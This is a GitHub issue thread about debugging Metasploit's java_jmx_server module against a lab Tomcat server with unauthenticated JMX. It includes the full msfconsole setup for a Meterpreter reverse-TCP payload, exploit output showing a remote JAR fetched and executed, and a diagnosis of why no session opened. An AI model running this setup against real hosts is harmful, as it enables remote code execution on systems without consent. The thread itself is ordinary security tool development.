### ISSUE TITLE
Problem with java_jmx_server

### ISSUE THREAD

**Issue by h0ng10** [rapid7/metasploit-framework#5918]
I tried to exploit a insecure JMX service. It seems to work but I don't get a reverse shell

Target setup:
Debian 7 - Server: Tomcat 7 
JMX on Tomcat is enabled via JAVA_OPTS  (/etc/default/tomcat7):
```
JAVA_OPTS="-Djava.rmi.server.hostname=192.168.178.236 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Djava.awt.headless=true -Xmx128m -XX:+UseConcMarkSweepGC"
``` 
Access via JConsole is possible.

Metasploit setup:
```
use exploit/multi/misc/java_jmx_server
set RHOST 192.168.178.236
set RPORT 1099
set SRVHOST 192.168.178.1
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.178.1
set LPORT 4242
```

Check works:
```
msf exploit(java_jmx_server) > check
[*] 192.168.178.236:1099 - The target appears to be vulnerable.
msf exploit(java_jmx_server) >
```

When I try to exploit the server, everything works as expected, but I don't get a shell back.

```
msf exploit(java_jmx_server) > exploit

[*] Started reverse handler on 192.168.178.1:4242
[*] 192.168.178.236:1099 - Sending RMI Header...
[*] 192.168.178.236:1099 - Discovering the JMXRMI endpoint...
[+] 192.168.178.236:1099 - JMXRMI endpoint on 192.168.178.236:60964
[*] 192.168.178.236:1099 - Proceeding with handshake...
[+] 192.168.178.236:1099 - Handshake with JMX MBean server on 192.168.178.236:60964
[*] 192.168.178.236:1099 - Loading payload...
[*] Using URL: http://192.168.178.1:8080/eegDmUij2uq7Q
[*] 192.168.178.236  java_jmx_server - Replied to request for mlet
[*] 192.168.178.236  java_jmx_server - Replied to request for payload JAR
[*] 192.168.178.236:1099 - Executing payload...
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(java_jmx_server) >
```

I can see the Metasploit MBean when I access the JMX server via JConsole, so Payload delivery seems to work. I then tried to set up a handler on my own and call the "run" method via JConsole.
Doing this I get the following exception:

```
Problem invoking run: java.net.BindException: Address already in use
```

I also tried the java/meterpreter/reverse_tcp payload on the same machine by deploying it via Tomcat Manager. This worked, so I think it is not a direct problem of the java payload itself.

Let me know if you have any questions.

**Comment by kernelsmith** [comment]
Try a different port for your shell, it looks like the one you're trying to use is already in use

**Comment by hmoore-r7** [comment]
Strange that the bind exception is coming from the Java side. I think @kernelsmith is right, but its not clear how this is happening based on your scripting logs. Can you try changing the LPORT?

**Comment by h0ng10** [comment]
Hi all

I thought that too, however that was not the case.  I sniffed the traffic from an exploit attempt
turned out, that Tomcat (or the OpenJDK environment ) tries to call the https URL for the JAR file a second time when the exploits calls the run method of the uploaded jar. At this time however, the Metasploit exploit already closed the http server.

![image](https://cloud.githubusercontent.com/assets/1886150/9694387/853aef2c-5358-11e5-8401-50b929ccb7ed.png)

The solution is to start the http service at the beginning and stop it after the disconnect request to the JMX service. I will prepare a pull request for that.

PS: I uploaded the pcap here:
https:///www.mogwaisecurity.de/download/metasploit_jmx_test.pcapng
